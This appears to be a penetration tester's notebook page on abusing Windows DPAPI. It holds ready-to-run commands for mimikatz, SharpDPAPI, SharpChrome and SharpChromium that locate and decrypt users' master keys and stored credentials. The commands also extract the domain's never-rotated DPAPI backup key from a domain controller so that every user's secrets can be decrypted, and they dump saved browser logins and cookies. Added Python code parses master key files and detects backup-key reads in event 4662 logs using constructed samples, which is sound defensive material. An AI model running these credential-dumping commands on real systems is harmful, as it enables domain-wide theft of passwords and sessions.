DPAPI
Data Protection API
https://habr.com/ru/post/434514/
ZN17 - Hunting for Credentials Dumping in Windows Environment (Teymur Kheirkhabarov).pdf (PDF, 8MB)
Master keys locations (hidden files, need -Force):
PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Protect\ (%appdata%\Microsoft\Protect\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Protect\ (%localappdata%\Microsoft\Protect\)
Credential files locations (hidden files, need -Force):
PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Credentials\ (%appdata%\Microsoft\Credentials\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ (%localappdata%\Microsoft\Credentials\)
Unhide files:
PS > cmd /c "attrib -h -s 00ff00ff-00ff-00ff-00ff-00ff00ff00ff"
PS > cmd /c "attrib -h -s 00ff00ff00ff00ff00ff00ff00ff00ff"
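The files listed above have a fixed on-disk layout, and knowing it helps when inventorying a host or deciding how a given key can be recovered. The following parser is an added example, not code from the notebook or from any of the tools it links: it decodes the 128-byte header of a per-user master key file and the small Preferred pointer file from %appdata%\Microsoft\Protect\<SID>\, following the structure layout used by mimikatz and dpapick (masterkey, backupkey, credhist and domainkey sections after the header). All sample bytes, GUIDs and the expiry date are constructed; nothing is decrypted.

```python
"""Added example, not from the notebook: decode the on-disk layout of a per-user
DPAPI master key file and the 'Preferred' pointer file found under
%appdata%\\Microsoft\\Protect\\<SID>\\. The layout follows the structures used by
mimikatz/dpapick (128-byte header, then masterkey, backupkey, credhist and
domainkey sections). Sample bytes are constructed; nothing is decrypted."""
import struct
import uuid
from datetime import datetime, timedelta, timezone

HEADER_LEN = 128
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
ALG_NAMES = {0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512",
             0x6603: "CALG_3DES", 0x6610: "CALG_AES_256"}
SAMPLE_GUID = "12345678-1234-1234-1234-123456789abc"         # constructed
SAMPLE_BACKUP_GUID = "01234567-89ab-cdef-0123-456789abcdef"  # constructed


def parse_preferred(data: bytes) -> dict:
    """'Preferred': little-endian GUID of the active master key + FILETIME expiry."""
    if len(data) < 24:
        raise ValueError("Preferred file too short")
    (filetime,) = struct.unpack_from("<Q", data, 16)
    return {"guid": str(uuid.UUID(bytes_le=data[:16])),
            "expires": FILETIME_EPOCH + timedelta(microseconds=filetime // 10)}


def _parse_key_section(sec: bytes) -> dict:
    """masterkey/backupkey section: version, 16-byte salt, PBKDF2 rounds, hash and cipher ALG_IDs."""
    version, salt, rounds, alg_hash, alg_crypt = struct.unpack_from("<I16sIII", sec, 0)
    return {"version": version, "salt": salt.hex(), "rounds": rounds,
            "hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
            "cipher": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
            "encrypted_len": len(sec) - 32}


def _parse_domain_key(sec: bytes) -> dict:
    """domainkey section: version, secret length, access-check length, GUID of the domain backup key."""
    version, secret_len, check_len = struct.unpack_from("<III", sec, 0)
    return {"version": version, "secret_len": secret_len, "access_check_len": check_len,
            "backup_key_guid": str(uuid.UUID(bytes_le=sec[12:28]))}


def parse_masterkey_file(data: bytes) -> dict:
    """Decode the header, verify the section lengths add up, and summarise each section."""
    if len(data) < HEADER_LEN:
        raise ValueError("master key file too short")
    version = struct.unpack_from("<I", data, 0)[0]
    guid = data[12:84].decode("utf-16-le")          # 36-char GUID stored as UTF-16LE
    flags, mk_len, bk_len, ch_len, dk_len = struct.unpack_from("<IQQQQ", data, 92)
    if HEADER_LEN + mk_len + bk_len + ch_len + dk_len != len(data):
        raise ValueError("section lengths do not add up: truncated or not a master key file")
    off = HEADER_LEN
    info = {"version": version, "guid": guid, "flags": flags}
    info["masterkey"] = _parse_key_section(data[off:off + mk_len])
    off += mk_len
    info["backupkey"] = _parse_key_section(data[off:off + bk_len]) if bk_len else None
    off += bk_len
    info["credhist_guid"] = str(uuid.UUID(bytes_le=data[off + 4:off + 20])) if ch_len else None
    off += ch_len
    info["domainkey"] = _parse_domain_key(data[off:off + dk_len]) if dk_len else None
    # A domainkey section means the key can also be recovered with the domain's DPAPI
    # backup key (what 'SharpDPAPI backupkey' + '/pvk' rely on), not only with the user's password.
    info["domain_recoverable"] = info["domainkey"] is not None
    return info


def build_sample_masterkey_file() -> bytes:
    """Constructed sample with realistic section sizes for a domain-joined user (no real key)."""
    def key_section(fill: int) -> bytes:
        return struct.pack("<I16sIII", 2, bytes([fill]) * 16, 8000, 0x800E, 0x6610) + bytes(144)
    mk, bk = key_section(0x11), key_section(0x22)
    ch = struct.pack("<I", 3) + uuid.UUID("aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee").bytes_le
    secret, check = bytes(256), bytes(96)
    dk = (struct.pack("<III", 2, len(secret), len(check))
          + uuid.UUID(SAMPLE_BACKUP_GUID).bytes_le + secret + check)
    header = struct.pack("<III", 2, 0, 0) + SAMPLE_GUID.encode("utf-16-le")
    header += struct.pack("<IIIQQQQ", 0, 0, 5, len(mk), len(bk), len(ch), len(dk))
    return header + mk + bk + ch + dk


def build_sample_preferred() -> bytes:
    """Constructed 'Preferred' file pointing at SAMPLE_GUID, expiring 2024-01-01 00:00 UTC."""
    return uuid.UUID(SAMPLE_GUID).bytes_le + struct.pack("<Q", 133485408000000000)


if __name__ == "__main__":
    print(parse_preferred(build_sample_preferred()))
    for key, value in parse_masterkey_file(build_sample_masterkey_file()).items():
        print(f"{key}: {value}")
```

Run against a real file by reading it with `-Force`-style access (`Path.read_bytes()`) and passing the bytes to parse_masterkey_file; a missing domainkey section tells you the key is tied only to the user's password, while a present one gives you the GUID of the DC backup key it was escrowed to, which is the same GUID that names the BCKUPKEY secret on the DC.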
Mimikatz
https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
Decrypt manually offline with known plaintext password:
mimikatz # dpapi::masterkey /in:00ff00ff-00ff-00ff-00ff-00ff00ff00ff /sid:S-1-5-21-4124311166-4116374192-336467615-500 /password:Passw0rd!
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:00ff00ff00ff00ff00ff00ff00ff00ff
SharpDPAPI
https://github.com/GhostPack/SharpDPAPI#table-of-contents
https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpDPAPI.ps1
Triage user's credentials, vaults, rdg and certificates:
PS > .\SharpDPAPI.exe triage /password:Passw0rd!
Triage machine's credentials (machinecredentials), vaults (machinevaults) and certificates (certificates /machine):
PS > .\SharpDPAPI.exe machinetriage
Retrieve the domain DPAPI backup key (never changes) from a DC and decrypt master key blobs for any user in the domain with it (needs DA privileges):
PS > .\SharpDPAPI.exe backupkey /nowrap [/server:DC01.megacorp.local] [/file:key.pvk]
PS > .\SharpDPAPI.exe credentials /pvk:key.pvk [/server:PC01.megacorp.local]
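Because the domain backup key is never rotated, its retrieval is the event a defender most wants to see. Pulling it off a DC reads the LSA secrets named BCKUPKEY_PREFERRED, BCKUPKEY_P and BCKUPKEY_<GUID>, and with object-access auditing on the DC that surfaces as Security event 4662 with ObjectType SecretObject, which is the shape the public Sigma rule for DPAPI backup key extraction matches on. The detector below is an added example, not part of the notebook or of SharpDPAPI: it runs that match over a handful of constructed 4662 records (plain dicts standing in for parsed event XML), applies an optional allowlist of accounts the organisation has baselined, and summarises hits per actor. The account names, host and timestamps are constructed, and which audit subcategory produces the event in your environment is an assumption to verify.

```python
"""Added example, not from the notebook: flag reads of the domain DPAPI backup key
on a domain controller. Extracting it reads the LSA secrets BCKUPKEY_PREFERRED /
BCKUPKEY_P / BCKUPKEY_<GUID>, logged as Security event 4662 with ObjectType
'SecretObject' when object-access auditing is enabled on the DC. Events below are
constructed dicts standing in for parsed event XML (not real telemetry)."""
from collections import Counter

BACKUP_KEY_READ_MASK = 0x2  # access bit the public Sigma rule matches for the secret read


def is_backupkey_read(ev: dict) -> bool:
    """True when the event is a 4662 read of a BCKUPKEY LSA secret."""
    if ev.get("EventID") != 4662 or ev.get("ObjectType") != "SecretObject":
        return False
    if "BCKUPKEY" not in ev.get("ObjectName", "").upper():
        return False
    try:
        mask = int(ev.get("AccessMask", "0x0"), 16)
    except ValueError:
        return False
    return bool(mask & BACKUP_KEY_READ_MASK)


def flag_backupkey_reads(events, allowlist=frozenset()) -> list:
    """One finding per matching event; skips accounts on the allowlist
    (assumption: the organisation has baselined which accounts legitimately read the key)."""
    allowed = {a.lower() for a in allowlist}
    findings = []
    for ev in events:
        if not is_backupkey_read(ev):
            continue
        actor = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
        if actor.lower() in allowed:
            continue
        findings.append({"time": ev["TimeCreated"], "host": ev["Computer"], "actor": actor,
                         "object": ev["ObjectName"], "severity": "high"})
    return findings


def summarise(findings) -> Counter:
    """Count findings per actor so repeated retrievals by one account stand out."""
    return Counter(f["actor"] for f in findings)


# Constructed sample events (not real telemetry); the last one is an ordinary DS object access
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-03-01T10:02:11Z", "Computer": "DC01.megacorp.local", "EventID": 4662,
     "SubjectDomainName": "MEGACORP", "SubjectUserName": "jdoe", "ObjectServer": "LSA",
     "ObjectType": "SecretObject", "ObjectName": "BCKUPKEY_PREFERRED Secret", "AccessMask": "0x2"},
    {"TimeCreated": "2024-03-01T10:02:11Z", "Computer": "DC01.megacorp.local", "EventID": 4662,
     "SubjectDomainName": "MEGACORP", "SubjectUserName": "jdoe", "ObjectServer": "LSA",
     "ObjectType": "SecretObject",
     "ObjectName": "BCKUPKEY_01234567-89ab-cdef-0123-456789abcdef Secret", "AccessMask": "0x2"},
    {"TimeCreated": "2024-03-01T10:05:40Z", "Computer": "DC01.megacorp.local", "EventID": 4662,
     "SubjectDomainName": "MEGACORP", "SubjectUserName": "svc-backup", "ObjectServer": "LSA",
     "ObjectType": "SecretObject", "ObjectName": "BCKUPKEY_P Secret", "AccessMask": "0x2"},
    {"TimeCreated": "2024-03-01T10:06:00Z", "Computer": "DC01.megacorp.local", "EventID": 4662,
     "SubjectDomainName": "MEGACORP", "SubjectUserName": "jdoe", "ObjectServer": "DS",
     "ObjectType": "%{bf967a86-0de6-11d0-a285-00aa003049e2}",
     "ObjectName": "CN=PC01,CN=Computers,DC=megacorp,DC=local", "AccessMask": "0x100"},
]


if __name__ == "__main__":
    hits = flag_backupkey_reads(SAMPLE_EVENTS, allowlist={"MEGACORP\\svc-backup"})
    for hit in hits:
        print(hit)
    print(summarise(hits))
```

Two retrievals by the same interactive account within seconds (the PREFERRED pointer followed by the GUID-named key, which is the order a full extraction reads them in) is the pattern worth paging on; a single read by a baselined service account is what the allowlist is for, and anything not on that list on a DC deserves a ticket.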
SharpChrome
https://github.com/GhostPack/SharpDPAPI#sharpchrome-commands
PS > .\SharpChrome.exe logins|cookies [/pvk:key.pvk]
SharpChromium
https://github.com/djhohnstein/SharpChromium
PS > ls "C:\Users\snovvcrash\AppData\Local\Google\Chrome\User Data\Default"
PS > .\SharpChromium.exe logins
PS > .\SharpChromium.exe cookies